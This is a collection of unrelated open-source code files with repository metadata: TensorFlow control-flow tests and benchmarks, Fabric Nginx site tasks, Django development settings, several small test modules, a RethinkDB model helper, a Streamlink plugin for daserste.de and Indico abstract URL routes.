var = variables.VariableV1(0)
assign = state_ops.assign(var, 1)
t, = control_flow_ops.tuple(
[constant_op.constant(0)], control_inputs=[assign])
# Should trigger the assign.
t.eval()
      self.assertEqual(1, var.eval())
class AssertTest(test.TestCase):
def testGuardedAssertDoesNotCopyWhenTrue(self):
with self.test_session(use_gpu=True) as sess:
with ops.device(test.gpu_device_name()):
value = constant_op.constant(1.0)
with ops.device("/cpu:0"):
true = constant_op.constant(True)
guarded_assert = control_flow_ops.Assert(true, [value], name="guarded")
unguarded_assert = gen_logging_ops._assert(
true, [value], name="unguarded")
opts = config_pb2.RunOptions(trace_level=config_pb2.RunOptions.FULL_TRACE)
guarded_metadata = config_pb2.RunMetadata()
sess.run(guarded_assert, options=opts, run_metadata=guarded_metadata)
unguarded_metadata = config_pb2.RunMetadata()
sess.run(unguarded_assert, options=opts, run_metadata=unguarded_metadata)
guarded_nodestat_names = [
n.node_name
for d in guarded_metadata.step_stats.dev_stats
for n in d.node_stats
]
unguarded_nodestat_names = [
n.node_name
for d in unguarded_metadata.step_stats.dev_stats
for n in d.node_stats
]
guarded_memcpy_nodestat_names = [
n for n in guarded_nodestat_names if "MEMCPYDtoH" in n
]
unguarded_memcpy_nodestat_names = [
n for n in unguarded_nodestat_names if "MEMCPYDtoH" in n
]
if "GPU" in [d.device_type for d in device_lib.list_local_devices()]:
# A copy was performed for the unguarded assert
self.assertLess(0, len(unguarded_memcpy_nodestat_names))
# No copy was performed for the guarded assert
self.assertEqual([], guarded_memcpy_nodestat_names)
class WhileOpBenchmark(test.Benchmark):
"""Evaluate the performance of while_loop op."""
def _getInitVariables(self):
batch_size = 10
image_size = 256
kernel_size = 3
depth = 16
init_step = constant_op.constant(-1)
image = variable_scope.get_variable(
"image",
initializer=random_ops.random_normal(
[batch_size, image_size, image_size, depth],
dtype=dtypes.float32,
stddev=1e-1))
kernel = variable_scope.get_variable(
"weights",
initializer=random_ops.truncated_normal(
[kernel_size, kernel_size, depth, depth],
dtype=dtypes.float32,
stddev=1e-1))
return init_step, image, kernel
def _runOneBenchmark(self,
default_device,
num_iters=10,
static_unroll=False,
steps=10):
"""Evaluate the while loop performance.
Args:
default_device: The default device to run all ops except the loop_body.
loop_body is always run on GPU.
num_iters: Number of iterations to run.
static_unroll: If true, run unrolled version; otherwise, run while_loop.
steps: Total number of repeated steps to run the loop.
Returns:
The duration of the run in seconds.
"""
def loop_body(i, x):
with ops.device("/gpu:0"):
# Always put loop body on GPU.
nx = nn_ops.conv2d(
input=x,
filter=kernel,
strides=[1, 1, 1, 1],
padding="SAME",
data_format="NHWC",
name="conv2d")
ni = math_ops.add(i, 1)
return ni, nx
ops.reset_default_graph()
with session.Session() as sess, ops.device(default_device):
# Get the initial id i, input x, and kernel.
i, x, kernel = self._getInitVariables()
sess.run(variables.global_variables_initializer())
if static_unroll:
for _ in xrange(steps):
i, x = loop_body(i, x)
else:
i, x = control_flow_ops.while_loop(
lambda i, _: i < steps,
loop_body, [i, x],
parallel_iterations=steps,
swap_memory=True)
r = math_ops.reduce_sum(x)
dx, dk = gradients_impl.gradients(r, [x, kernel])
# Use group to avoid fetching back results.
r = control_flow_ops.group(dx, dk)
for _ in xrange(3):
        # Exclude warm-up time.
sess.run(r)
start_time = time.time()
for _ in xrange(num_iters):
sess.run(r)
return (time.time() - start_time) / num_iters
def benchmarkWhileOpCrossDevicePlacement(self):
iters = 10
# Run loop body on GPU, but other ops on CPU.
duration = self._runOneBenchmark("cpu", iters, static_unroll=False)
self.report_benchmark(
name="while_op_cross_device", iters=iters, wall_time=duration)
def benchmarkWhileOpSameDevicePlacement(self):
iters = 10
# Run all ops on the same GPU device.
duration = self._runOneBenchmark("gpu", iters, static_unroll=False)
self.report_benchmark(
name="while_op_same_device", iters=iters, wall_time=duration)
def benchmarkWhileOpUnrollCrossDevicePlacement(self):
iters = 10
# Run loop body on GPU, but other ops on CPU.
duration = self._runOneBenchmark("cpu", iters, static_unroll=True)
self.report_benchmark(
name="unroll_cross_device_cpu", iters=iters, wall_time=duration)
def benchmarkWhileOpUnrollSameDevicePlacement(self):
iters = 10
# Run all ops on GPU.
duration = self._runOneBenchmark("gpu", iters, static_unroll=True)
self.report_benchmark(
name="unroll_same_device", iters=iters, wall_time=duration)
@test_util.with_control_flow_v2
class EagerTest(test.TestCase):
def testCond(self):
with context.eager_mode():
pred = math_ops.less(1, 2)
fn1 = lambda: [constant_op.constant(10)]
fn2 = lambda: [constant_op.constant(20)]
r = control_flow_ops.cond(pred, fn1, fn2)
self.assertAllEqual(r.numpy(), 10)
self.assertFalse(isinstance(r, list))
def testWhileLoop(self):
with context.eager_mode():
tensor = constant_op.constant([1, 2, 3, 4, 5])
self.assertAllEqual(isum(tensor).numpy(), [46, 47, 48, 49, 50])
def testWhileLoopWithMaxIterations(self):
with context.eager_mode():
tensor = constant_op.constant([1, 2, 3, 4, 5])
self.assertAllEqual(
isum(tensor, maximum_iterations=3).numpy(),
[1 + 3, 2 + 3, 3 + 3, 4 + 3, 5 + 3])
def testWhileWithMaximumIterationsAndSingleArgument(self):
with context.eager_mode():
tensor = constant_op.constant(0)
r = control_flow_ops.while_loop(
lambda i: i < 3, lambda i: i + 1, [tensor], maximum_iterations=1)
self.assertEqual(1, r.numpy())
def testWithDependencies(self):
with context.eager_mode():
t1 = constant_op.constant(1)
t2 = constant_op.constant(2)
t3 = control_flow_ops.with_dependencies(t1, t2)
self.assertAllEqual(t2.numpy(), t3.numpy())
def testTuple(self):
with context.eager_mode():
t1 = constant_op.constant(1)
t2 = constant_op.constant(2)
tup1, tup2 = control_flow_ops.tuple([t1, t2])
self.assertAllEqual(t1.numpy(), tup1.numpy())
self.assertAllEqual(t2.numpy(), tup2.numpy())
def testCase(self):
with context.eager_mode():
x = constant_op.constant(1)
y = constant_op.constant(2)
z = constant_op.constant(3)
f1 = lambda: constant_op.constant(17)
f2 = lambda: constant_op.constant(23)
f3 = lambda: constant_op.constant(-1)
r1 = control_flow_ops.case(
[(x < y, f1), (x > z, f2)], default=f3, exclusive=True)
self.assertAllEqual(r1.numpy(), 17)
if __name__ == "__main__":
test.main()
| {
"content_hash": "f08cd81bf4c6308361b366852e82fa09",
"timestamp": "",
"source": "github",
"line_count": 3450,
"max_line_length": 112,
"avg_line_length": 36.526376811594204,
"alnum_prop": 0.6117715210766886,
"repo_name": "kobejean/tensorflow",
"id": "d91a848e01350a92894811739257d529aad636ab",
"size": "126739",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tensorflow/python/kernel_tests/control_flow_ops_py_test.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Assembly",
"bytes": "2867"
},
{
"name": "Batchfile",
"bytes": "9258"
},
{
"name": "C",
"bytes": "341894"
},
{
"name": "C#",
"bytes": "8446"
},
{
"name": "C++",
"bytes": "49273038"
},
{
"name": "CMake",
"bytes": "195712"
},
{
"name": "Dockerfile",
"bytes": "36400"
},
{
"name": "Go",
"bytes": "1253646"
},
{
"name": "HTML",
"bytes": "4680032"
},
{
"name": "Java",
"bytes": "836009"
},
{
"name": "Jupyter Notebook",
"bytes": "2604741"
},
{
"name": "LLVM",
"bytes": "6536"
},
{
"name": "Makefile",
"bytes": "52734"
},
{
"name": "Objective-C",
"bytes": "15650"
},
{
"name": "Objective-C++",
"bytes": "99243"
},
{
"name": "PHP",
"bytes": "1357"
},
{
"name": "Perl",
"bytes": "7536"
},
{
"name": "PureBasic",
"bytes": "25356"
},
{
"name": "Python",
"bytes": "41122917"
},
{
"name": "Ruby",
"bytes": "553"
},
{
"name": "Shell",
"bytes": "466896"
},
{
"name": "Smarty",
"bytes": "6976"
}
],
"symlink_target": ""
} |
from argyle.base import upload_template
from argyle.system import restart_service
from fabric.api import abort, sudo, task
from fabric.contrib import files
@task
def remove_default_site():
"""Remove the default Nginx site if it exists."""
disable_site('default')
@task
def upload_nginx_site_conf(site_name, template_name=None, context=None, enable=True):
"""Upload Nginx site configuration from a template."""
template_name = template_name or [u'nginx/%s.conf' % site_name, u'nginx/site.conf']
site_available = u'/etc/nginx/sites-available/%s' % site_name
upload_template(template_name, site_available, context=context, use_sudo=True)
if enable:
enable_site(site_name)
@task
def enable_site(site_name):
"""Enable an available Nginx site."""
site_available = u'/etc/nginx/sites-available/%s' % site_name
site_enabled = u'/etc/nginx/sites-enabled/%s' % site_name
if files.exists(site_available):
sudo(u'ln -s -f %s %s' % (site_available, site_enabled))
restart_service(u'nginx')
else:
abort(u'%s site configuration is not available' % site_name)
@task
def disable_site(site_name):
"""Disables Nginx site configuration."""
site = u'/etc/nginx/sites-enabled/%s' % site_name
if files.exists(site):
sudo(u'rm %s' % site)
restart_service(u'nginx')
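# Usage sketch (assumptions: Fabric 1.x style invocation as used by argyle, the
# tasks imported into your fabfile; the host and site name "mysite" below are
# placeholders, with a matching template at nginx/mysite.conf or the generic
# nginx/site.conf):
#
#   fab -H deploy@example.com upload_nginx_site_conf:mysite
#   fab -H deploy@example.com disable_site:mysite
#
# upload_nginx_site_conf renders the template into sites-available and, because
# enable=True by default, symlinks it into sites-enabled and restarts nginx.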
| {
"content_hash": "f5ec7f9abe4a479f3e5d55fcc763f270",
"timestamp": "",
"source": "github",
"line_count": 45,
"max_line_length": 87,
"avg_line_length": 30.333333333333332,
"alnum_prop": 0.673992673992674,
"repo_name": "mlavin/argyle",
"id": "dadeb52198b6c986a4b595b6382c1f4e84bb5914",
"size": "1365",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "argyle/nginx.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Python",
"bytes": "71211"
},
{
"name": "Ruby",
"bytes": "248"
},
{
"name": "Shell",
"bytes": "5096"
}
],
"symlink_target": ""
} |
"""
Django settings for DjangoQuickTour project.
Generated by 'django-admin startproject' using Django 1.10.4.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.10/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.10/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'bn@(8@nb2@jn6tck7d(cz3b3@95e1-q_#-p0pws&9)5))8ip5)'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'bootstrap_admin',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'blog',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'DjangoQuickTour.urls'
from django.conf import global_settings
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [
# insert your TEMPLATE_DIRS here
],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
# Insert your TEMPLATE_CONTEXT_PROCESSORS here or use this
# list if you haven't customized them:
'django.contrib.auth.context_processors.auth',
'django.template.context_processors.debug',
'django.template.context_processors.i18n',
'django.template.context_processors.media',
'django.template.context_processors.static',
'django.template.context_processors.tz',
'django.contrib.messages.context_processors.messages',
'django.template.context_processors.request'
]
},
},
]
BOOTSTRAP_ADMIN_SIDEBAR_MENU = True
WSGI_APPLICATION = 'DjangoQuickTour.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.10/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.10/topics/i18n/
LANGUAGE_CODE = 'zh-Hans'
TIME_ZONE = 'Asia/Shanghai'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.10/howto/static-files/
STATIC_URL = '/static/'
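# Production override sketch (an assumption, not part of this project: values are
# read from environment variables with illustrative names):
#
#   SECRET_KEY = os.environ.get('DJANGO_SECRET_KEY', SECRET_KEY)
#   DEBUG = os.environ.get('DJANGO_DEBUG', '') == '1'
#   ALLOWED_HOSTS = os.environ.get('DJANGO_ALLOWED_HOSTS', '').split(',')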
| {
"content_hash": "eb910c2eb329618655cd9e6d9c9fdfe3",
"timestamp": "",
"source": "github",
"line_count": 133,
"max_line_length": 91,
"avg_line_length": 27.56390977443609,
"alnum_prop": 0.6783960720130933,
"repo_name": "mingyeh/DjangoQuickTour",
"id": "79452e7dd21ddf621f9148e46f1468a09de9f939",
"size": "3666",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "DjangoQuickTour/DjangoQuickTour/settings.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "2502"
},
{
"name": "HTML",
"bytes": "3775"
},
{
"name": "Python",
"bytes": "14670"
}
],
"symlink_target": ""
} |
"""
__init__
Test Suite
:copyright: (c) 2013 by Openlabs Technologies & Consulting (P) Limited
:license: BSD, see LICENSE for more details.
"""
import unittest
import trytond.tests.test_tryton
from test_category import TestCategory
def suite():
"""
Define suite
"""
test_suite = trytond.tests.test_tryton.suite()
test_suite.addTests([
unittest.TestLoader().loadTestsFromTestCase(TestCategory),
])
return test_suite
if __name__ == '__main__':
unittest.TextTestRunner(verbosity=2).run(suite())
| {
"content_hash": "af78da18035e96920ad3a342316cc7bf",
"timestamp": "",
"source": "github",
"line_count": 27,
"max_line_length": 74,
"avg_line_length": 20.555555555555557,
"alnum_prop": 0.6576576576576577,
"repo_name": "openlabs/nereid-catalog-icecat",
"id": "c66e5c3a63f9c11a1a2e1b4a993d32643dd2a234",
"size": "579",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/__init__.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "12326"
}
],
"symlink_target": ""
} |
import io
import unittest
from unittest.mock import patch
from kattis import k_methodicmultiplication
###############################################################################
class SampleInput(unittest.TestCase):
'''Problem statement sample inputs and outputs'''
def test_sample_input_1(self):
'''Run and assert problem statement sample input 1 and output.'''
inputs = []
inputs.append('S(S(0))')
inputs.append('S(S(S(0)))')
inputs = '\n'.join(inputs) + '\n'
outputs = 'S(S(S(S(S(S(0))))))\n'
with patch('sys.stdin', io.StringIO(inputs)) as stdin,\
patch('sys.stdout', new_callable=io.StringIO) as stdout:
k_methodicmultiplication.main()
self.assertEqual(stdout.getvalue(), outputs)
self.assertEqual(stdin.read(), '')
def test_sample_input_2(self):
'''Run and assert problem statement sample input 2 and output.'''
inputs = []
inputs.append('S(S(S(S(S(0)))))')
inputs.append('0')
inputs = '\n'.join(inputs) + '\n'
outputs = '0\n'
with patch('sys.stdin', io.StringIO(inputs)) as stdin,\
patch('sys.stdout', new_callable=io.StringIO) as stdout:
k_methodicmultiplication.main()
self.assertEqual(stdout.getvalue(), outputs)
self.assertEqual(stdin.read(), '')
###############################################################################
if __name__ == '__main__':
unittest.main()
| {
"content_hash": "96f090c17ae4d7ca7b41f92b05d11be4",
"timestamp": "",
"source": "github",
"line_count": 44,
"max_line_length": 79,
"avg_line_length": 34.56818181818182,
"alnum_prop": 0.52465483234714,
"repo_name": "ivanlyon/exercises",
"id": "a6dff839abcf745e7a69dc03d4fad8be9f43560e",
"size": "1521",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "test/test_k_methodicmultiplication.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "1283"
},
{
"name": "HTML",
"bytes": "9068"
},
{
"name": "Python",
"bytes": "96419"
}
],
"symlink_target": ""
} |
"""Engine related exceptions."""
class EngineManagerError(Exception):
"""Any exception related to engine manager."""
pass
| {
"content_hash": "cbe64be2fe163e378097d59835df47e9",
"timestamp": "",
"source": "github",
"line_count": 6,
"max_line_length": 50,
"avg_line_length": 22,
"alnum_prop": 0.7045454545454546,
"repo_name": "simphony/simphony-common",
"id": "feb19fa5e7952dcec10242dcbbbc9e6b92d5f13f",
"size": "132",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "simphony/engine/exceptions.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Batchfile",
"bytes": "663"
},
{
"name": "Python",
"bytes": "543455"
}
],
"symlink_target": ""
} |
import uuid
from django.db import connections
from django.db.models import Model, UUIDField
def _compiler_for_queryset(qs, which='SQLCompiler'):
connection = connections[qs.db]
Compiler = connection.ops.compiler(which)
return Compiler(qs.query, connection, connection.alias)
class RqlQueryProxy(object):
"""
    The goal of this proxy is to deliver the connection instance to the run() method.
"""
def __init__(self, query, connection):
self.query = query
self.connection = connection
def __call__(self, *args, **kwargs):
return RqlQueryProxy(self.query(*args, **kwargs), self.connection)
def __getattr__(self, name):
if name == "run":
def runner(*args, **kwargs):
return self.query.run(self.connection, *args, **kwargs)
return runner
else:
return RqlQueryProxy(getattr(self.query, name), self.connection)
class RethinkDBModel(Model):
class Meta:
abstract = True
id = UUIDField(primary_key=True, default=uuid.uuid4)
@classmethod
def r(cls):
compiler = _compiler_for_queryset(cls.objects.get_queryset())
return RqlQueryProxy(compiler.get_table(), compiler.connection)
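# Usage sketch (assumptions: "Post" is a hypothetical model and this project's
# default database uses the RethinkDB backend):
#
#   class Post(RethinkDBModel):
#       class Meta:
#           app_label = 'blog'
#
#   # Raw ReQL through the proxy; run() picks up the compiler's connection,
#   # so no connection argument is needed here.
#   rows = Post.r().filter({'title': 'hello'}).run()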
| {
"content_hash": "b550a069a3cc3d5d72fd244a97cbac5a",
"timestamp": "",
"source": "github",
"line_count": 46,
"max_line_length": 72,
"avg_line_length": 25.02173913043478,
"alnum_prop": 0.6959165942658557,
"repo_name": "d2rk/django-rethinkdb-engine",
"id": "7efdf19fb15a0935f39edbd9fd289931b79a5b2a",
"size": "1151",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "django_rethinkdb_engine/models.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Makefile",
"bytes": "726"
},
{
"name": "Python",
"bytes": "16400"
}
],
"symlink_target": ""
} |
import logging
import re
from urllib.parse import urljoin
from streamlink.plugin import Plugin
from streamlink.plugin.api import validate
from streamlink.stream import HLSStream, HTTPStream
from streamlink.utils import parse_json, verifyjson
log = logging.getLogger(__name__)
class ard_live(Plugin):
_url_re = re.compile(r"https?://((www|live)\.)?daserste\.de/")
_player_re = re.compile(r'''data-ctrl-player\s*=\s*"(?P<jsondata>.*?)"''')
_player_url_schema = validate.Schema(
validate.transform(_player_re.search),
validate.any(None, validate.all(
validate.get("jsondata"),
validate.text,
validate.transform(lambda v: parse_json(v.replace("'", '"'))),
validate.transform(lambda v: verifyjson(v, "url")),
))
)
_mediainfo_schema = validate.Schema({
"mc": {
validate.optional("_title"): validate.text,
validate.optional("_isLive"): bool,
validate.optional("_geoblocked"): bool,
"_mediaArray": [{
"_mediaStreamArray": [{
"_quality": validate.any(validate.text, int),
"_stream": validate.any(validate.text, [validate.text]),
}]
}],
},
}, validate.get("mc"))
_QUALITY_MAP = {
"auto": "auto",
4: "1080p",
3: "720p",
2: "544p",
1: "288p",
0: "144p"
}
@classmethod
def can_handle_url(cls, url):
return cls._url_re.match(url) is not None
def _get_streams(self):
res = self.session.http.get(self.url)
data_url = self._player_url_schema.validate(res.text)
if not data_url:
log.error("Could not find video at this url.")
return
data_url = urljoin(res.url, data_url)
log.debug(f"Player URL: '{data_url}'")
res = self.session.http.get(data_url)
mediainfo = parse_json(res.text, name="MEDIAINFO", schema=self._mediainfo_schema)
log.trace("Mediainfo: {0!r}".format(mediainfo))
for media in mediainfo["_mediaArray"]:
for stream in media["_mediaStreamArray"]:
stream_ = stream["_stream"]
if isinstance(stream_, list):
if not stream_:
continue
stream_ = stream_[0]
if ".m3u8" in stream_:
yield from HLSStream.parse_variant_playlist(self.session, stream_).items()
elif ".mp4" in stream_ and ".f4m" not in stream_:
yield "{0}".format(self._QUALITY_MAP[stream["_quality"]]), HTTPStream(self.session, stream_)
else:
if ".f4m" not in stream_:
log.error("Unexpected stream type: '{0}'".format(stream_))
__plugin__ = ard_live
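# Usage sketch (the URL below is illustrative; any daserste.de page matched by
# _url_re should work):
#
#   streamlink "https://www.daserste.de/live/index.html" best
#
# Streamlink resolves this plugin via can_handle_url() and then calls
# _get_streams() to build the HLS/HTTP stream list.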
| {
"content_hash": "39b299e3c75faa98e287f64e77979476",
"timestamp": "",
"source": "github",
"line_count": 81,
"max_line_length": 112,
"avg_line_length": 35.382716049382715,
"alnum_prop": 0.5436147941381717,
"repo_name": "beardypig/streamlink",
"id": "f1ec0b7e2c5bcc0815343d2c83f04086091c1956",
"size": "2866",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/streamlink/plugins/ard_live.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Batchfile",
"bytes": "838"
},
{
"name": "Python",
"bytes": "1538432"
},
{
"name": "Shell",
"bytes": "18707"
}
],
"symlink_target": ""
} |
from functools import partial
from flask import current_app, g
from indico.modules.events.abstracts.compat import compat_abstract
from indico.modules.events.abstracts.controllers import (abstract, abstract_list, boa, display, email_templates,
management, reviewing)
from indico.web.flask.util import make_compat_redirect_func
from indico.web.flask.wrappers import IndicoBlueprint
_bp = IndicoBlueprint('abstracts', __name__, url_prefix='/event/<int:event_id>', template_folder='templates',
virtual_template_folder='events/abstracts')
# Display pages (not related to any specific abstract)
_bp.add_url_rule('/abstracts/', 'call_for_abstracts', display.RHCallForAbstracts)
_bp.add_url_rule('/abstracts/mine.pdf', 'my_abstracts_pdf', display.RHMyAbstractsExportPDF)
_bp.add_url_rule('/abstracts/submit', 'submit', display.RHSubmitAbstract, methods=('GET', 'POST'))
_bp.add_url_rule('/abstracts/submit/<uuid>', 'submit_invited_abstract', display.RHSubmitInvitedAbstract,
methods=('GET', 'POST'))
# Reviewing pages (display area, not related to any specific abstract)
_bp.add_url_rule('/abstracts/reviewing/', 'display_reviewable_tracks', reviewing.RHDisplayReviewableTracks)
_bp.add_url_rule('/abstracts/reviewing/<int:track_id>/', 'display_reviewable_track_abstracts',
reviewing.RHDisplayReviewableTrackAbstracts)
_bp.add_url_rule('/abstracts/reviewing/<int:track_id>/customize', 'display_customize_abstract_list',
reviewing.RHDisplayAbstractListCustomize, methods=('GET', 'POST'))
_bp.add_url_rule('/abstracts/reviewing/<int:track_id>/attachments', 'display_download_attachments',
reviewing.RHDisplayAbstractsDownloadAttachments, methods=('POST',))
_bp.add_url_rule('/abstracts/reviewing/<int:track_id>/abstracts.pdf', 'display_abstracts_pdf_export',
reviewing.RHDisplayAbstractsExportPDF, methods=('POST',))
_bp.add_url_rule('/abstracts/reviewing/<int:track_id>/abstracts.csv', 'display_abstracts_csv_export',
reviewing.RHDisplayAbstractsExportCSV, methods=('POST',))
_bp.add_url_rule('/abstracts/reviewing/<int:track_id>/abstracts.xlsx', 'display_abstracts_xlsx_export',
reviewing.RHDisplayAbstractsExportExcel, methods=('POST',))
# Book of Abstracts
_bp.add_url_rule('/manage/abstracts/boa/settings', 'manage_boa_settings', boa.RHBOASettings, methods=('GET', 'POST'))
_bp.add_url_rule('/manage/abstracts/boa/custom/upload', 'upload_boa_file', boa.RHUploadBOAFile, methods=('POST',))
_bp.add_url_rule('/manage/abstracts/boa/custom', 'manage_custom_boa', boa.RHCustomBOA, methods=('POST', 'DELETE'))
_bp.add_url_rule('/book-of-abstracts.pdf', 'export_boa', boa.RHExportBOA)
_bp.add_url_rule('/manage/book-of-abstracts.zip', 'export_boa_tex', boa.RHExportBOATeX)
# Misc
_bp.add_url_rule('/abstracts/other-list', 'other_abstracts', reviewing.RHListOtherAbstracts, methods=('POST',))
# Management dashboard
_bp.add_url_rule('/manage/abstracts/', 'management', management.RHAbstractsDashboard)
# CFA scheduling
_bp.add_url_rule('/manage/abstracts/schedule', 'schedule_abstracts_call', management.RHScheduleCFA,
methods=('GET', 'POST'))
_bp.add_url_rule('/manage/abstracts/open', 'open_abstracts_call', management.RHOpenCFA, methods=('POST',))
_bp.add_url_rule('/manage/abstracts/close', 'close_abstracts_call', management.RHCloseCFA, methods=('POST',))
# Configuration
_bp.add_url_rule('/manage/abstracts/settings', 'manage_submission_settings', management.RHManageAbstractSubmission,
methods=('GET', 'POST'))
_bp.add_url_rule('/manage/abstracts/review-settings', 'manage_reviewing_settings', management.RHManageAbstractReviewing,
methods=('GET', 'POST'))
_bp.add_url_rule('/manage/abstracts/questions', 'manage_reviewing_questions',
management.RHManageAbstractReviewingQuestions, methods=('GET', 'POST'))
_bp.add_url_rule('/manage/abstracts/questions/sort', 'sort_reviewing_questions',
management.RHSortReviewingQuestions, methods=('POST',))
_bp.add_url_rule('/manage/abstracts/questions/create', 'create_reviewing_question',
management.RHCreateAbstractReviewingQuestion, methods=('GET', 'POST'))
_bp.add_url_rule('/manage/abstracts/questions/<int:question_id>/edit', 'edit_reviewing_question',
management.RHEditAbstractReviewingQuestion, methods=('POST', 'GET'))
_bp.add_url_rule('/manage/abstracts/questions/<int:question_id>', 'delete_reviewing_question',
management.RHDeleteAbstractReviewingQuestion, methods=('DELETE',))
_bp.add_url_rule('/manage/abstracts/teams', 'manage_reviewing_roles', management.RHManageReviewingRoles,
methods=('GET', 'POST'))
# Abstract list (management)
_bp.add_url_rule('/manage/abstracts/list/', 'manage_abstract_list', abstract_list.RHAbstractList)
_bp.add_url_rule('/manage/abstracts/list/customize', 'customize_abstract_list', abstract_list.RHAbstractListCustomize,
methods=('GET', 'POST'))
_bp.add_url_rule('/manage/abstracts/list/static-url', 'generate_static_url', abstract_list.RHAbstractListStaticURL,
methods=('POST',))
_bp.add_url_rule('/manage/abstracts/abstracts.pdf', 'abstracts_pdf_export', abstract_list.RHAbstractsExportPDF,
methods=('GET', 'POST'))
_bp.add_url_rule('/manage/abstracts/abstracts.csv', 'abstracts_csv_export', abstract_list.RHAbstractsExportCSV,
methods=('GET', 'POST'))
_bp.add_url_rule('/manage/abstracts/abstracts.xlsx', 'abstracts_xlsx_export', abstract_list.RHAbstractsExportExcel,
methods=('GET', 'POST'))
_bp.add_url_rule('/manage/abstracts/abstracts.json', 'abstracts_json_export', abstract_list.RHAbstractsExportJSON,
methods=('GET', 'POST'))
_bp.add_url_rule('/manage/abstracts/create', 'manage_create_abstract', abstract_list.RHCreateAbstract,
methods=('GET', 'POST'))
# Bulk abstract actions (management)
_bp.add_url_rule('/manage/abstracts/delete', 'manage_delete_abstracts', abstract_list.RHDeleteAbstracts,
methods=('POST',))
_bp.add_url_rule('/manage/abstracts/person-list', 'person_list', abstract_list.RHAbstractPersonList, methods=('POST',))
_bp.add_url_rule('/manage/abstracts/attachments', 'download_attachments', abstract_list.RHAbstractsDownloadAttachments,
methods=('GET', 'POST'))
_bp.add_url_rule('/manage/abstracts/judge', 'manage_judge_abstracts', abstract_list.RHBulkAbstractJudgment,
methods=('POST',))
# E-mail templates
_bp.add_url_rule('/manage/abstracts/email-templates/', 'email_tpl_list', email_templates.RHEmailTemplateList)
_bp.add_url_rule('/manage/abstracts/email-templates/add',
'email_tpl_add', email_templates.RHAddEmailTemplate, methods=('GET', 'POST'))
_bp.add_url_rule('/manage/abstracts/email-templates/sort',
'email_tpl_sort', email_templates.RHSortEmailTemplates, methods=('POST',))
_bp.add_url_rule('/manage/abstracts/email-templates/<email_tpl_id>',
'email_tpl_delete', email_templates.RHDeleteEmailTemplate, methods=('DELETE',))
_bp.add_url_rule('/manage/abstracts/email-templates/<email_tpl_id>/edit',
'email_tpl_rule_edit', email_templates.RHEditEmailTemplateRules, methods=('GET', 'POST'))
_bp.add_url_rule('/manage/abstracts/email-templates/<email_tpl_id>/edit-text',
'email_tpl_text_edit', email_templates.RHEditEmailTemplateText, methods=('GET', 'POST'))
_bp.add_url_rule('/manage/abstracts/email-templates/<email_tpl_id>',
'email_tpl_rest', email_templates.RHEmailTemplateREST, methods=('PATCH',))
# URLs available in both management and display areas
# Note: When adding a new one here make sure to specify `defaults=defaults`
# for each rule. Otherwise you may not get the correct one.
for prefix, is_management in (('/manage/abstracts', True), ('/abstracts', False)):
defaults = {'management': is_management}
# Abstract display
_bp.add_url_rule(prefix + '/<int:abstract_id>/', 'display_abstract', abstract.RHDisplayAbstract, defaults=defaults)
_bp.add_url_rule(prefix + '/<int:abstract_id>/attachments/<file_id>/<filename>', 'download_attachment',
abstract.RHAbstractsDownloadAttachment, defaults=defaults)
_bp.add_url_rule(prefix + '/<int:abstract_id>/abstract-reviews.pdf', 'manage_abstract_pdf_export',
abstract.RHAbstractExportFullPDF, defaults=defaults)
_bp.add_url_rule(prefix + '/<int:abstract_id>/abstract.pdf', 'display_abstract_pdf_export',
abstract.RHAbstractExportPDF, defaults=defaults)
_bp.add_url_rule(prefix + '/<int:abstract_id>/notifications', 'notification_log',
